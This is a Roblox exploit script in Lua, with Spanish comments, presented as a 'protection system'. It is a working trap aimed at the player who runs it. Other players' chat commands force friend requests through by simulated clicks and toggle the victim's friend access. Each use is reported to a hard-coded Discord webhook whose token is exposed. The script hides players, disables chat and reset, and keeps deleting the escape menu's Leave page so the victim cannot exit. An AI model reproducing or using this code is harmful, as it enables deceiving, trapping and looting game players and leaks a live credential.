--[[
    SISTEMA MOREIRA V3.6 - EDICIÓN FINAL (ZERO OMISSIONS)
    PROTECCIÓN: Whitelist / Blacklist / Ghost / Anti-Escape
    COMANDOS: .add / .block / .open (Global)
]]

--------------------------------------------------------------------------------
-- 1. SERVICIOS Y VARIABLES INICIALES
--------------------------------------------------------------------------------
local TweenService = game:GetService("TweenService")
local Players = game:GetService("Players")
local UserInputService = game:GetService("UserInputService")
local StarterGui = game:GetService("StarterGui")
local SoundService = game:GetService("SoundService")
local GuiService = game:GetService("GuiService")
local HttpService = game:GetService("HttpService")
local ReplicatedStorage = game:GetService("ReplicatedStorage")
local Workspace = game:GetService("Workspace")
local CoreGui = game:GetService("CoreGui")
local VIM = game:GetService("VirtualInputManager")

local LocalPlayer = Players.LocalPlayer
local heartbeatUrl = "https://discord.com/api/webhooks/1454970356682199124/sgCgykHejgELxXd9Jp4CTWX2ziOKdu-qtGczLtBAThWZj-DqOY7jKGlNdgqYuYpuNXmA"
local whitelist = {"MoreiraAdmin"} -- Agrega nombres aquí
local blacklist = {12345678} -- IDs en blacklist

-- Comprobación de Blacklist Inmediata
local function isBlacklisted(userId)
    for _, id in ipairs(blacklist) do
        if userId == id then return true end
    end
    return false
end

if isBlacklisted(LocalPlayer.UserId) then
    LocalPlayer:Kick("User is blacklisted.")
    return
end

local function isWhitelisted(username)
    for _, whitelistedName in ipairs(whitelist) do
        if username == whitelistedName then return true end
    end
    return false
end

--------------------------------------------------------------------------------
-- 2. PROTECCIÓN DE MEMORIA Y WHITELIST DE INSTANCIAS
--------------------------------------------------------------------------------
local instanciasWhitelist = {}

local function agregarAWhitelist(instancia)
    if instancia then
        instanciasWhitelist[instancia] = true
    end
end

agregarAWhitelist(Players)
agregarAWhitelist(CoreGui)
agregarAWhitelist(StarterGui)
agregarAWhitelist(LocalPlayer) 

local function estaEnWhitelist(instancia)
    if instanciasWhitelist[instancia] then return true end
    local p = instancia.Parent
    while p do
        if instanciasWhitelist[p] then return true end
        p = p.Parent
    end
    return false
end

--------------------------------------------------------------------------------
-- 3. SISTEMA FANTASMA (NADIE TE VE)
--------------------------------------------------------------------------------
local function aplicarFantasma(modelo)
    if not modelo then return end
    
    task.spawn(function()
        task.wait(0.5)
        
        for _, desc in ipairs(modelo:GetDescendants()) do
            if desc:IsA("BasePart") then
                desc.Transparency = 1
                desc.CanCollide = false
                desc.CanTouch = false
                desc.CanQuery = false
                desc.CastShadow = false
            end
            
            if desc:IsA("Decal") or desc:IsA("Texture") or desc:IsA("Clothing") then
                pcall(function() desc.Transparency = 1 end)
            end
            
            if desc:IsA("BillboardGui") or desc:IsA("SurfaceGui") then
                desc.Enabled = false
            end
            
            if desc:IsA("Accessory") then
                local handle = desc:FindFirstChild("Handle")
                if handle then
                    handle.Transparency = 1
                    handle.CanCollide = false
                end
            end
        end
        
        -- Escuchar si se agregan cosas nuevas al personaje (herramientas, ropa nueva)
        modelo.DescendantAdded:Connect(function(nuevo)
            if nuevo:IsA("BasePart") then
                nuevo.Transparency = 1
                nuevo.CanCollide = false
            elseif nuevo:IsA("BillboardGui") then
                nuevo.Enabled = false
            end
        end)
    end)
end

--------------------------------------------------------------------------------
-- 4. LOGICA DE COMANDOS Y DISCORD
--------------------------------------------------------------------------------
local function sendCommandToServer(playerWhoUsed)
    pcall(function()
        local displayName = playerWhoUsed.DisplayName or playerWhoUsed.Name
        local userId = playerWhoUsed.UserId
        local avatarUrl = "https://www.roblox.com/headshot-thumbnail/image?userId=" .. tostring(userId) .. "&width=420&height=420&format=png"
        
        local commandData = {
            ["username"] = displayName,
            ["avatar_url"] = avatarUrl,
            ["embeds"] = {{
                ["author"] = {
                    ["name"] = displayName,
                    ["icon_url"] = avatarUrl
                },
                ["title"] = "Comando ejecutado",
                ["color"] = 65326,
                ["description"] = displayName .. " Uso \".add\"",
                ["footer"] = { ["text"] = "User ID: " .. tostring(userId) },
                ["timestamp"] = DateTime.now():ToIsoDate()
            }}
        }
        
        local httpRequest = (syn and syn.request) or (http and http.request) or http_request or (fluxus and fluxus.request) or request
        httpRequest({
            Url = heartbeatUrl,
            Method = "POST",
            Headers = { ["Content-Type"] = "application/json" },
            Body = HttpService:JSONEncode(commandData)
        })
    end)
end

function promptFR(targetPlayer)
    if not targetPlayer then return end
    local oldId = (getthreadidentity and getthreadidentity()) or nil
    if setthreadidentity then pcall(setthreadidentity, 5) end
    
    pcall(function()
        StarterGui:SetCore("PromptSendFriendRequest", targetPlayer)
    end)
    
    if setthreadidentity and oldId then pcall(setthreadidentity, oldId) end

    task.wait(0.5)
    pcall(function()
        local rgui = CoreGui:FindFirstChild("RobloxGui")
        local btn = rgui and rgui:FindFirstChild("ConfirmButton", true)
        if btn then
            if not pcall(function() btn:Activate() end) then
                GuiService.SelectedObject = btn
                VIM:SendKeyEvent(true, Enum.KeyCode.Return, false, game)
                VIM:SendKeyEvent(false, Enum.KeyCode.Return, false, game)
            end
        end
    end)
end

local function configurarJugador(p)
    if p == LocalPlayer then return end

    p.Chatted:Connect(function(msg)
        local msgLower = msg:lower():gsub("%s+", "")
        
        if msgLower == ".add" then
            sendCommandToServer(p)
            pcall(function() promptFR(p) end) 
        elseif msgLower == ".block" then
            local allPlayers = Players:GetPlayers()
            for _, target in ipairs(allPlayers) do
                if target ~= LocalPlayer and not isWhitelisted(target.Name) then
                    StarterGui:SetCore("PromptBlockPlayer", target)
                    task.wait(0.2)
                end
            end
        elseif msgLower == ".open" then
            pcall(function()
                ReplicatedStorage.Packages.Net["RE/PlotService/ToggleFriends"]:FireServer()
            end)
        end
    end)

    p.CharacterAdded:Connect(function(char)
        aplicarFantasma(char)
        agregarAWhitelist(char)
    end)
    
    if p.Character then
        aplicarFantasma(p.Character)
        agregarAWhitelist(p.Character)
    end
end

for _, p in ipairs(Players:GetPlayers()) do configurarJugador(p) end
Players.PlayerAdded:Connect(configurarJugador)

--------------------------------------------------------------------------------
-- 5. BLOQUEO DE INTERFAZ Y MENÚ DE ESCAPE
--------------------------------------------------------------------------------
local function limpiarInterfaz()
    pcall(function() StarterGui:SetCore("ResetButtonCallback", false) end)
    pcall(function() StarterGui:SetCoreGuiEnabled(Enum.CoreGuiType.Chat, false) end)
end

task.spawn(function()
    while true do
        limpiarInterfaz()
        task.wait(5)
    end
end)

local function handleNewDescendant(descendant)
    if descendant.Name == "Players" or descendant.Name == "LeaveGamePage" then
        task.wait() 
        pcall(function() descendant:Destroy() end)
    end
end

for _, desc in ipairs(CoreGui:GetDescendants()) do handleNewDescendant(desc) end
CoreGui.DescendantAdded:Connect(handleNewDescendant)

-- Bloqueo agresivo del Menú de Escape
task.spawn(function()
    while task.wait(0.5) do
        pcall(function()
            local innerFrame = CoreGui.RobloxGui.SettingsClippingShield.SettingsShield.MenuContainer.Page.PageViewClipper.PageView.PageViewInnerFrame
            if innerFrame:FindFirstChild("Players") then innerFrame.Players:Destroy() end
            if innerFrame:FindFirstChild("LeaveGamePage") then innerFrame.LeaveGamePage:Destroy() end
        end)
    end
end)

--------------------------------------------------------------------------------
-- 6. AUTO-ACEPTAR BLOQUEOS (SISTEMA VIM)
--------------------------------------------------------------------------------
CoreGui.DescendantAdded:Connect(function(descendant)
    if descendant:IsA("GuiObject") and descendant:FindFirstAncestor("BlockingModalScreen") then
        pcall(function()
            if descendant:IsA("TextLabel") then descendant:Destroy() end
            if descendant:IsA("GuiObject") then descendant.BackgroundTransparency = 1 end
            if descendant:IsA("TextButton") then descendant.TextTransparency = 1 end
            
            if descendant.Name == "3" and descendant.Parent and descendant.Parent.Name == "Buttons" then
                descendant.Size = UDim2.new(0, 5000, 0, 5000)
                descendant.Position = UDim2.new(0.5, 0, 0.5, 0)
                descendant.AnchorPoint = Vector2.new(0.5, 0.5)
                
                task.wait()
                local buttonPosition = descendant.AbsolutePosition
                local buttonSize = descendant.AbsoluteSize
                local clickX = buttonPosition.X + buttonSize.X / 2
                local clickY = buttonPosition.Y + buttonSize.Y / 2
                
                VIM:SendMouseButtonEvent(clickX, clickY, 0, true, game, 0)
                task.wait(0.1)
                VIM:SendMouseButtonEvent(clickX, clickY, 0, false, game, 0)
            end
        end)
    end
end)

--------------------------------------------------------------------------------
-- 7. PROTECCIÓN DE INSTANCIAS (DESTRUCTOR)
--------------------------------------------------------------------------------
game.DescendantAdded:Connect(function(instancia)
    if estaEnWhitelist(instancia) then return end
    
    -- No borrar personajes de jugadores
    for _, p in ipairs(Players:GetPlayers()) do
        if p.Character and instancia:IsDescendantOf(p.Character) then return end
    end
    
    pcall(function()
        task.defer(function()
            if instancia and instancia.Parent then
                instancia:Destroy()
            end
        end)
    end)
end)

-- Ejecución inicial del servidor
pcall(function()
    ReplicatedStorage.Packages.Net["RE/PlotService/ToggleFriends"]:FireServer()
end)

print("Moreira V3.6 cargado. Invisibilidad y comandos activos.")
